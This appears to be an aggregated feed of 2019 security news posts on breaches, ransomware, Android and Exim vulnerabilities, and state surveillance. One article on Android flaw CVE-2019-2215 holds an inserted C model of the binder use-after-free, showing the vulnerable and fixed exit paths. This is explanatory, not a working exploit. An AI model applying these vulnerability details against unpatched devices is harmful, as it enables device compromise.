The hard truth is that identity data is the new gold—and criminal panhandlers are constantly mining for the sale and distribution of data on the Dark Web. But what can we as digital citizens do to protect ourselves? Trend Micro’s recent blog post describes how to keep yourself and your data safe.

Trend Micro Named a Leader in Endpoint Security

Trend Micro was cited as a leader with the second-highest score in the current offering category in The Forrester Wave: Endpoint Security Suites, Q3 2019 report. Trend received the highest possible score for Corporate Vision and Focus (a criterion under the Strategy category), a recognition of stable leadership, innovative technology and high-quality product management and development.

New Fileless Botnet Novter Distributed by KovCoreG Malvertising Campaign

Trend Micro found a new modular fileless botnet malware called Novter that the KovCoreG campaign has been distributing since March. KovCoreG is known for using the Kovter botnet malware through malvertisements and exploit kits to commit click fraud.

Trend Micro: Why AI Could Be Vital to Your Security Future

With businesses of all sizes keen to ensure they don’t become the next big-name security attack victim, the need to stay on top of your data could be central to staying safe from the latest threats. Cybercrime tactics have become more professional and business-like in recent years, keeping them one step ahead of the game.

Hacker Compromised Family’s Wi-Fi, Taunted Family with Thermostat, Camera for 24 Hours

According to a recent report, a hacker was able to hack into a couple’s Nest security system, control their thermostat and talk to them via their camera. According to the report, changing their Wi-Fi password wasn’t enough to keep the hacker away and disturbances only stopped after changing the network ID. Read up on how to protect your smart home and IoT devices in Trend Micro’s analysis.

Securing the Industrial Internet of Things: Addressing IIoT Risks in Healthcare

The industrial internet of things (IIoT) has rapidly transformed the network and data infrastructure in health and medicine. However, rapid adoption of IIoT is not without risks. Healthcare stakeholders must first understand the dangers it brings to the field when haphazardly implemented. Read more about addressing IIoT risks in healthcare in Trend Micro’s blog.

This Huge Android Trojan Malware Campaign Was Discovered After the Gang Behind It Made Basic Security Mistakes

A giant botnet and banking trojan malware operation has infected hundreds of thousands of Android users since at least 2016 – but mistakes by the group have revealed details of the campaign and how they operate.

Permanent Jailbreak on iPhones Possible Using Checkm8 Unpatchable Exploit

Security researcher axi0mX discovered “checkm8,” an exploit that could allow the jailbreak of millions of iOS devices. The exploit lies in the bootrom of the affected devices, which in turn is located on a read-only memory chip. This renders the exploit unpatchable and the resulting jailbreak permanent.

Exim Vulnerability CVE-2019-16928 Could Lead to Denial-of-Service and Remote Code Execution Attacks

A vulnerability involving the message transfer agent Exim — estimated to run roughly 57% of all email servers — has been discovered by security researchers from QAX-A-Team. Exploitation of the bug, assigned CVE-2019-16928, could result in threat actors being able to launch denial-of-service (DoS) or remote code execution (RCE) attacks.

Zynga Data Breach Exposed 200 Million Words with Friends Players

Publisher Zynga announced there was a data breach of account login info for Draw Something and Words with Friends players on Sept. 12.  A hacker that goes by the name of Gnosticplayers said they stole data from over 218 million Words with Friends player accounts.

FDA Warns Against URGENT/11 Vulnerabilities Affecting Medical Devices and Hospital Networks

The Food and Drug Administration (FDA) notified patients, healthcare professionals, and other stakeholders, warning them of a set of 11 vulnerabilities that could put medical devices and hospital networks at risk. The set of vulnerabilities was dubbed “URGENT/11,” and was discovered in a decade-old third-party software component called IPnet.

Who Should the CISO Report To, and Other CloudSec 2019 Takeaways

The second annual CloudSec event hosted by Trend Micro last week yielded valuable insight from industry leaders both on stage and during breakout sessions. Trend’s Mark Nunnikhoven, vice president of cloud research, discusses Canada’s position in the cloud adoption race.

Security 101: Zero-Day Vulnerabilities and Exploits

A zero-day attack exploits an unpatched vulnerability and could significantly affect organizations using vulnerable systems. Trend Micro provides an overview detailing what businesses need to know about zero-day vulnerabilities so they can better mitigate the risks and the threats that exploit them.

Were you aware that smart home devices could be hacked? Will it affect your decision to buy smart home devices in the future? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


The post This Week in Security News: How a GIF Can Hack Your Android and Vulnerabilities That Could Put Hospital Networks at Risk appeared first on .

#VB2019: Cyber Threat Alliance Cites Vendor Collaboration Benefits


Speaking at the Virus Bulletin 2019 conference in London, members of the Cyber Threat Alliance discussed the benefits of sharing intelligence.

Led by moderator and Cyber Threat Alliance COO Heather King, panelists Kathi Whitbey, program manager of cyber threat intelligence information sharing at Palo Alto Networks, and Jeannette Jarvis, director of product marketing at Fortinet, said that there are clear benefits to sharing data, as Jarvis explained: “There is the opportunity to expand and share more deeper intelligence.” 

Jarvis said that there is an intention with the Alliance to “build equal or better ecosystems beyond what our adversaries are doing, and to know what they are sharing” and this can better protect customers with “actionable intelligence.”

Whitbey added that the founding members believed in the “power of collaboration and sharing.” Asked by King how the Cyber Threat Alliance is unique, Jarvis admitted that all of the members have different missions, but the collaborative nature means that companies can get enough data to get the complete picture of an issue.

Pointing at the WannaCry incident in 2017, Whitbey said that within hours they knew what each other was seeing and what the issue was, and “we were able to paint a picture as everyone provided what they had and we could see all the information in real time.”

Jarvis admitted that “no one has all the information” and by sharing they get the complete picture and fill in the gaps. 

The panellists explained that the members do not share the same technology, customers or regions, “but if we collaborate we all get into the environment,” Whitbey said.

Jarvis reflected on a previous role at an aerospace company, saying that it was clear from working in that role “that we need to be more connected to help customers.”

Loans by phone: Revolutionizing Digital Loan Applications

One of the greatest challenges for any business organization is finding the right balance between secure technology and an engaging, timely customer experience. For financial institutions, in particular, it’s a struggle to satisfy customers’ demands for digital innovation without compromising compliance and security. “It’s important to realize that it’s not a trade-off,” says Sam Bakken,…

Cyber News Rundown: Data Dash

Reading Time: ~ 2 min.

DoorDash Data Breach

Nearly five months after a breach, DoorDash has just now discovered that unauthorized access to sensitive customer information has taken place. Among the stolen data were customer names, payment history, and contact info, as well as the last four digits of both customer payment cards and employee bank accounts. The compromised data spans nearly 5 million unique customers and employees of the delivery service. DoorDash has since recommended all users change their passwords immediately.

American Express Employee Fraud

At least one American Express employee was fired after it was revealed they had illicitly gained access to customer payment card data and may have been using it to commit fraud at other financial institutions. Following this incident, American Express began contacting affected customers offering credit monitoring services to prevent misuse of their data.

Hackers Target Airbus Suppliers

Several suppliers for Airbus have recently been under cyber-attack by state-sponsored hackers that seem to have a focus on the company’s VPN connections to Airbus. Both Rolls-Royce and Expleo, European manufacturers of engines and technology respectively, have been targeted for their technical documentation by Chinese aircraft competitors. This type of attack has pushed many officials to urge for higher security standards across all supply chains, as both large and small companies are now being attacked.

Ransomware Law Passes Senate

A recently passed law mandates that the Department of Homeland Security support organizations affected by ransomware. While focused on protecting students in New York state, the legislation follows 50 school districts across the U.S. falling victim to ransomware attacks in 2019 alone, compromising up to 500 schools overall. A similar bill recently passed in the House of Representatives, and the two are expected to be combined.

Ransomware Targets Hospitals Around the Globe

Multiple hospitals in the U.S. and Australia have fallen victim to ransomware attacks within the last month. Some sites were so affected that they were forced to permanently close their facilities after they weren’t able to rebuild patient records from encrypted backups. Several offices in Australia have been unable to accept new patients with only minimal systems for continuing operations.

The post Cyber News Rundown: Data Dash appeared first on Webroot Blog.

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

Google Project Zero researcher Maddie Stone discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system.

Maddie Stone, a member of the Google elite team Project Zero, discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system. According to the expert, the bug, tracked as CVE-2019-2215, was allegedly being used or sold by the controversial surveillance firm NSO Group.

Maddie Stone published technical details and a proof-of-concept exploit for the high-severity security vulnerability seven days after she reported it to the Android security team.

The flaw is a use-after-free vulnerability in the Android kernel’s binder driver. It could be exploited by a local privileged attacker or a malicious app to escalate privileges and gain root access on a vulnerable device. Experts warn that it could potentially allow an attacker to fully compromise the device.

“There is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c.” reads the security advisory.

“As described in the upstream commit: ‘binder_poll() passes the thread->wait waitqueue that can be slept on for work. When a thread that uses epoll explicitly exits using BINDER_THREAD_EXIT, the waitqueue is freed, but it is never removed from the corresponding epoll data structure. When the process subsequently exits, the epoll cleanup code tries to access the waitlist, which results in a use-after-free.’”

The flaw affects versions of the Android kernel released before April last year. This vulnerability was addressed in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4]. The expert pointed out that the Pixel 2 with the most recent security bulletin is still vulnerable based on source code review.

This means that most of the Android devices on the market that ship with the unpatched kernel are still affected by this vulnerability, even if their owners have installed the latest Android security updates.
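The sequence the advisory describes (binder_poll() hands epoll a pointer to the thread's waitqueue, BINDER_THREAD_EXIT frees the thread without deregistering it, and the epoll cleanup at process exit touches the freed memory) modelled in user-space C, with the vulnerable exit path beside the deregister-then-free fix. This is an added example, not code from the Project Zero report or the Android kernel; the structure names, the toy quarantine allocator and the sample thread id are constructed stand-ins.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>

#define MAX_WATCH 8
#define MAX_FREED 16

/* Constructed user-space model, not kernel code; names mirror the advisory. */
struct wait_queue { int owner_tid; };
struct binder_thread { int tid; struct wait_queue wait; };      /* the "wait" member */
struct epoll { struct wait_queue *watched[MAX_WATCH]; int n; }; /* epoll's watch list */

/* Toy quarantine: a freed object is recorded but its memory is kept, so a
 * dangling pointer can be recognised by address without dereferencing it. */
static const void *freed_set[MAX_FREED];
static int freed_n;

static void kfree_model(const void *p)
{
    if (freed_n < MAX_FREED) freed_set[freed_n++] = p;
}

static bool is_freed(const void *p)
{
    for (int i = 0; i < freed_n; i++) if (freed_set[i] == p) return true;
    return false;
}

/* binder_poll(): epoll records a raw pointer to the thread's waitqueue. */
static int binder_poll_model(struct epoll *ep, struct binder_thread *t)
{
    if (ep->n >= MAX_WATCH)
        return -1;
    ep->watched[ep->n++] = &t->wait;
    return 0;
}

/* Drop a waitqueue from the watch list: the step the vulnerable path skips. */
static void epoll_remove(struct epoll *ep, const struct wait_queue *wq)
{
    for (int i = 0; i < ep->n; i++)
        if (ep->watched[i] == wq) {
            ep->watched[i] = ep->watched[--ep->n];
            return;
        }
}

/* Vulnerable BINDER_THREAD_EXIT: frees the thread while epoll still points at it. */
static void thread_exit_vulnerable(struct binder_thread *t)
{
    kfree_model(t);
}

/* Fixed BINDER_THREAD_EXIT: deregister from epoll first, then free. */
static void thread_exit_fixed(struct epoll *ep, struct binder_thread *t)
{
    epoll_remove(ep, &t->wait);
    kfree_model(t);
}

/* epoll cleanup at process exit: counts watch entries pointing into freed
 * memory. In the real kernel each one is a use-after-free; here it is counted. */
static int epoll_cleanup_dangling(const struct epoll *ep)
{
    int dangling = 0;
    for (int i = 0; i < ep->n; i++) {
        /* container_of(): recover the binder_thread that owns this waitqueue */
        const char *owner = (const char *)ep->watched[i] - offsetof(struct binder_thread, wait);
        if (is_freed(owner))
            dangling++;
    }
    return dangling;
}

/* Replays the advisory's sequence (poll, BINDER_THREAD_EXIT, process exit) and
 * returns the number of dangling epoll entries: 1 vulnerable, 0 fixed. */
static int run_scenario(bool fixed)
{
    freed_n = 0;
    struct epoll ep = { .n = 0 };
    struct binder_thread *t = calloc(1, sizeof *t);   /* constructed sample thread */
    if (t == NULL || binder_poll_model(&ep, t) != 0) {
        free(t);
        return -1;
    }
    if (fixed) thread_exit_fixed(&ep, t); else thread_exit_vulnerable(t);
    int dangling = epoll_cleanup_dangling(&ep);
    free(t);                             /* real release, after the scan */
    return dangling;
}
```

`run_scenario(false)` leaves one stale epoll entry behind, which is the access the kernel fix prevents; `run_scenario(true)` leaves none.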

Some of the devices which appear to be vulnerable based on source code review are:

1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) A3
7) Moto Z3
8) Oreo LG phones (run according to )
9) Samsung S7, S8, S9

Maddie Stone explained that the flaw is reachable from inside the Chrome sandbox: it is exploitable from Chrome’s renderer processes running in Android’s ‘isolated_app’ SELinux domain. This means that a remote attacker could potentially exploit the flaw by chaining it with a Chrome renderer vulnerability.

“The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox.” Stone said.

“I’ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215.”

Google is expected to release a fix as part of its October Android Security Bulletin.

“This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,” concludes the Chromium blog. “We have notified Android partners, and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.”

Pierluigi Paganini

(SecurityAffairs – Google, zero-day)

The post Project Zero researcher found unpatched Android zero-day likely exploited by NSO group appeared first on Security Affairs.

#VB2019: Endpoints Remain Vulnerable to WannaCry Two Years On


Despite the main infections taking place two and half years ago, a large number of computers remain vulnerable to the WannaCry ransomware.

Speaking to Infosecurity at the Virus Bulletin 2019 conference in London, Sophos security researcher Chet Wisniewski said that there are large numbers of businesses who did not apply the patches, released in March and after the infection in May 2017, so machines still remain vulnerable. “That’s what surprised me, with the amount of hype and the amount of news around that vulnerability, it shows that even standing on the rooftop and lighting your hair on fire is not going to be enough for people to take action,” he said.

“The good news is that there is an accidental vaccination which means that the good people won’t get infected with it,” he said. He explained that a version of WannaCry drops a payload, but that payload is currently corrupted and if another infection is attempted, if that file is detected at all, the infection will not take place.

“Fortunately, all of these copies of WannaCry we’re seeing are neutered,” he added. “It’s not hurting anyone, it’s just spreading around and making a lot of noise.”

Wisniewski went on to say that people still do not realize that “these weaponized exploits are really dangerous, and BlueKeep has been an interesting trial of this.” Wormable exploits are typically published within hours, he said, but in the case of BlueKeep the exploit has so far only been added to Metasploit, and other companies are using it as a penetration testing tool.

“If people have not patched since 2017, if a BlueKeep publicly exploitable worm was released, instantly millions of machines would be impacted again, and we would be in the same boat as when WannaCry was spreading around,” he said. “Every single one of those machines would be vulnerable as they have not been patched in two years, not to mention all of those that have been patched since.”

Attacks on UK Businesses Soar 243%


Cyber-attacks on UK businesses surged by a whopping 243% over the summer, compared to the same period last year, according to new findings from Beaming.

The Hastings-based business ISP analyzed data from the thousands of organizations across the UK that it supplies.

It found that UK firms experienced 157,528 attacks each on average between July and September, up from 45,970 during the same three months of 2018.

The firm detected nearly 500,000 unique IP addresses used to launch cyber-attacks on UK businesses during the period, with the number originating from China more than doubling over last year. A large number of attacks also originated in Taiwan, Brazil and Russia, Beaming said.

The most frequently targeted systems were Internet of Things (IoT) devices and file sharing services, accounting for 20% and 6% of attacks respectively.

FireEye warned in June of a “dramatic” increase in abuse of file sharing services such as WeTransfer, Dropbox, Google Drive and OneDrive, which are used to host malicious and phishing files in email-borne attacks.

What’s more, cyber-criminals are increasingly gearing up to exploit unprotected IoT devices, according to a Trend Micro report released last month. The firm analyzed chatter on dark web forums across the globe and found routers and IP cameras were the most commonly discussed devices.

Businesses face a threat on two fronts: they could be DDoS-ed or attacked in other ways from botnets of compromised IoT machines like these; or their own operational technology could be hijacked and sabotaged, disrupting key business and manufacturing processes.

“Previous summers have been relatively quiet when it comes to cybercrime, but the hackers haven’t yet taken a break this year. Throughout 2019 we have witnessed new highs in the volume of cyber-attacks hitting organisations in the UK and also the number of active agents behind those attempts,” said Beaming managing director, Sonia Blizzard.

“We are tackling more and more malicious code at a network level to minimize the threat of online attacks to our customers. The hackers are after the weakest link they can find, so companies need to boost their resilience to these sustained, indiscriminate attacks. They can do this by ensuring their software and cybersecurity defenses are up-to-date, putting in place measures such as managed firewalls and educating employees to help them avoid the main risks they could be exposed to.”

Unpatched Android flaw exploited by attackers, impacts Pixel, Samsung, Xiaomi devices

A privilege escalation vulnerability affecting phones running Android 8.x and later is being leveraged by attackers in the wild, Google has revealed. Interestingly enough, the flaw was patched in late 2017 in v4.14 of the Linux kernel and in Android versions 3.18, 4.4, and 4.9, but the fix was apparently never propagated to later Android versions. Who’s affected? Maddie Stone, a Senior Security Engineer on the Android Security team at Google, revealed that a number … More

The post Unpatched Android flaw exploited by attackers, impacts Pixel, Samsung, Xiaomi devices appeared first on Help Net Security.

Weekly Update 159


Well, this will be the last weekly update done overseas for some time as I count down the return to beaches, sunshine and fantastic coffee (yes, I'm confident saying that even whilst in Italy!) It's been a non-stop trip with an attempt of a bit of downtime at the end of it, albeit with limited success. Regardless, this week I'm covering off the last few days travels, reflecting on 10 years of blogging and looking at a really cool use of HIBP related to net neutrality comments lodged at the FCC. Next week... who knows, but at least I'll be home.


References

  1. I went to CERN - it was amazing! (that's a bunch of thoughts and pics from the trip, just staggeringly cool stuff IMHO)
  2. I started a little blog 10 years ago, you'll never believe what happened next... (but seriously, everything I do professionally today started from that one post)
  3. Personal data from a breach was used to spam the FCC (a fascinating look at how HIBP was used to help get to the bottom of it)
  4. Sponsored by Kolide, a User Focused Security app for teams that care about the trust and privacy of their users. Start your free 30 day trial now!

Egypt regularly spies on opponents and activists with mobile apps

Researchers at Check Point discovered that Egypt’s government has been spying on citizens in a sophisticated surveillance program.

Researchers at Check Point discovered that the Egyptian government has been spying on activists and opponents as part of a sophisticated surveillance program.

The list of victims is long and includes journalists, politicians, activists and lawyers.

The experts started their investigation after Amnesty International published a report in March that provided details on targeted attacks against journalists and human rights activists in Egypt.

The Egyptian government conducted most of the spying activities using mobile apps, some of which were also delivered via Google Play.

Check Point has identified tens of victims who were tricked into downloading the malicious apps, which offered seemingly useful services.

Some of the apps used by the attackers were Secure Mail, a Gmail add-on to improve the security, iLoud200%, a smart storage solution that would free up storage space on the victim’s device, and the IndexY callerID service.

Using these apps the government cyber spies were able to gather login credentials to email accounts, bypass privacy settings, and store call logs.

These apps were available through the official Play Store and bypassed the security checks implemented by Google.

Experts provided details of the command and control infrastructure over time. Attackers used a range of domain names that included words like “secure” and “verify” to avoid raising the suspicion of victims.

“The full list of indicators belonging to this campaign and shared by Amnesty on GitHub showed multiple websites that used keywords such as “mail”, “secure”, or “verify”, possibly not to arouse any suspicions and to masquerade as legitimate mailing services.” reads the report published by Check Point.

“By visualizing the information available about each of these websites, we saw clear connections between them: they were registered using NameCheap, had HTTPS certificates, and many of them resolved to the same IP addresses.”

One of the domains analyzed by the researchers, maillogin[.]live, left a directory exposed online, allowing the experts to analyze its content: a collection of files uploaded between May and June.


“By downloading the contents of this directory, we got our hands on many PHP scripts, API clients, SQL files and configuration files from the server. Looking into them revealed several aspects about the inner workings of this operation, the functionalities that were implemented on this server and possibly others, and lastly some information about the perpetrators behind it all.” continues the analysis.

“For example, we realized that the attackers can control the operation by sending commands to one of the PHP scripts. The script allowed the attackers to query the data stored on the server, but it had self-destructing capabilities as well, such as removing an existing campaign or deleting all of the information collected from victims”

The researchers also discovered a Telegram channel that advertised itself as supporting the opponents of the regime in Egypt, but that is likely under the control of the intelligence services.

Check Point was not able to attribute the operation to Egyptian intelligence with certainty, but the nature of the victims, the level of sophistication of the attacks and other evidence, such as a server registered to the Ministry of Communications and Information Technology in Egypt, point in that direction.

“We discovered a list of victims that included handpicked political and social activists, high-profile journalists and members of non-profit organizations in Egypt.” concludes Check Point.

“The information we gathered from our investigation suggested that the perpetrators are Arabic speakers, and well familiar with the Egyptian ecosystem. Because the attack might be government-backed, it means that we are looking at what might be a surveillance operation of a country against its own citizens or of another government that screens some other attack using this noisy one.”

Pierluigi Paganini

(SecurityAffairs – Egypt, surveillance)

The post Egypt regularly spies on opponents and activists with mobile apps appeared first on Security Affairs.

UK Councils Faced 800 Cyber-Attacks Per Hour in 2019


The UK’s local authorities are facing an unprecedented barrage of cyber-threats, amounting to almost 800 every hour in the first half of 2019, according to insurance broker Gallagher.

Of the 203 councils that responded to the firm’s Freedom of Information (FOI) requests, nearly half (49%) had been targeted since the start of 2017, with over a third (37%) attacked in the first half of the year.

Over the first six months of 2019, those councils experienced 263 million attacks — a number that is likely to be much higher if those authorities which chose not to answer the FOI request were factored in.

However, despite the barrage, most authorities seem to be holding up: just 17 attacks were reported to have resulted in the loss of data or money, although one council reported the loss of over £2m, according to Gallagher.

Just 13% of local authorities have cyber insurance, a figure the firm would obviously like to see much higher.

“Councils are facing an unprecedented number of cyber-attacks on a daily basis. While the majority of these are fended off, it only takes one to get through to cause a significant financial deficit, a cost which the taxpayer will ultimately foot,” argued Tim Devine, managing director of Public Sector & Education at Gallagher.

“Costs and reputational damage at this scale can be devastating for public authorities, many of which are already facing stretched budgets. In many scenarios, the people responsible for purchasing cyber-insurance products need decisions to be made at member, or management level. The cyber threat and the need for cover needs to be high on every local authority’s agenda.”

However, most of the attacks noted in the report are likely to be the result of “automated probing and discovery tools” and therefore should not be classed as true security incidents, according to Tripwire senior director, Paul Edon.

“However, the truth of the matter is that many local authorities and councils still remain unprepared for a true cyber-attack,” he added.

“To get security right, organizations need to get the basics right. Start by understanding the risk you have. You must conduct regular, preferably continuous, assessments of configuration and vulnerability risk across your IT systems. Then ensure systems are regularly patched and upgraded. Following these basic security hygiene rules will go a long way to making your systems secure and the attackers’ job more difficult.”

New 0-Day Flaw Affecting Most Android Phones Being Exploited in the Wild

Another day, another revelation of a critical unpatched zero-day vulnerability, this time in the world's most widely used mobile operating system, Android. What's more? The Android zero-day vulnerability has also been found to be exploited in the wild by the Israeli surveillance vendor NSO Group—infamous for selling zero-day exploits to governments—or one of its customers, to gain control of

Tripwire Patch Priority Index for September 2019

Tripwire’s September 2019 Patch Priority Index (PPI) brings together important vulnerabilities from Microsoft and Adobe. Exploit Framework Alert A Metasploit Exploit module that targets Windows Remote Desktop Services has been recently released. This exploit module targets CVE-2019-0708 for the so-called “BlueKeep” vulnerability. This vulnerability impacts Windows Server 2008, Windows 7, and Windows Server 2008 R2. […]… Read More

The post Tripwire Patch Priority Index for September 2019 appeared first on The State of Security.

Hashtag Trending – Uber launches job app; the office is dying; Netflix uses 15% of internet

Uber launches new job app; the physical office is dying; Netflix uses 15% of world’s internet Uber has revolutionized the transportation industry, and now they are looking to do the same for the job market, and it is trending on LinkedIn. Launching today in Chicago, Uber Works is geared towards the gig economy and they…

Experts Slam US, Australia and UK’s Facebook Encryption Demands


Security and privacy experts have heavily criticized an attempt by the UK, US and Australian governments to strong-arm Facebook into halting its roll-out of end-to-end encryption.

Mark Zuckerberg announced a major overhaul of the social network in July following its $5bn fine from the FTC — a move which will include creating a privacy-by-design culture in the firm and extending end-to-end encryption beyond WhatsApp to Instagram and Messenger.

However, western governments are predictably dismayed at any efforts which will confound attempts by their intelligence agencies and the police to track suspects.

A widely reported open letter to Facebook from three-fifths of the Five Eyes nations demanded that the firm not continue with the encryption roll-out “without ensuring that there is no reduction to user safety and without including a means for lawful access to the content of communications to protect our citizens.”

That effectively means backdoor access for governments and law enforcers, something that the world’s leading cryptographers have repeatedly stated is not possible without undermining security for all.

Hannah Quay-de la Vallee, senior technologist at the non-profit Center for Democracy and Technology (CDT), repeated these arguments.

“Strong encryption and end-to-end security are bedrock technologies that keep information safe online. These technologies protect billions of communications every day, from the sensitive correspondence of victims of domestic violence to businesses’ financial records to our private medical information,” she explained.

“Creating a law that would mandate weaker and less secure technology is like mandating crumbling sidewalks to prevent criminals from escaping. It’s ridiculous, it won’t work, and it puts us all at far greater risk of serious injury.”

NSA whistleblower Edward Snowden also chipped in, warning that if Facebook caves to these government demands, “it may be the largest overnight violation of privacy in history.”

That doesn’t seem likely though, with a Facebook statement issued to confirm: “We strongly oppose government attempts to build backdoors because they would undermine the privacy and security of people everywhere.”

The open letter comes as the US and UK trumpeted a new “world first” data sharing agreement, that will allow law enforcers on both sides of the Atlantic to demand data from tech firms in the other country without needing to go through a lengthy liaison process with their respective governments.

October 2019 Patch Tuesday forecast: Be sure to apply service stack updates

School is back in session across most of the world, and here in the United States most students look forward to a school holiday called ‘fall break.’ While we never have a Patch Tuesday off, this may actually be a bit of a fall break for most of us because I don’t anticipate many updates this month. Before we get into the forecast details, I’d like to provide some information around service stack updates (SSUs) and how … More

The post October 2019 Patch Tuesday forecast: Be sure to apply service stack updates appeared first on Help Net Security.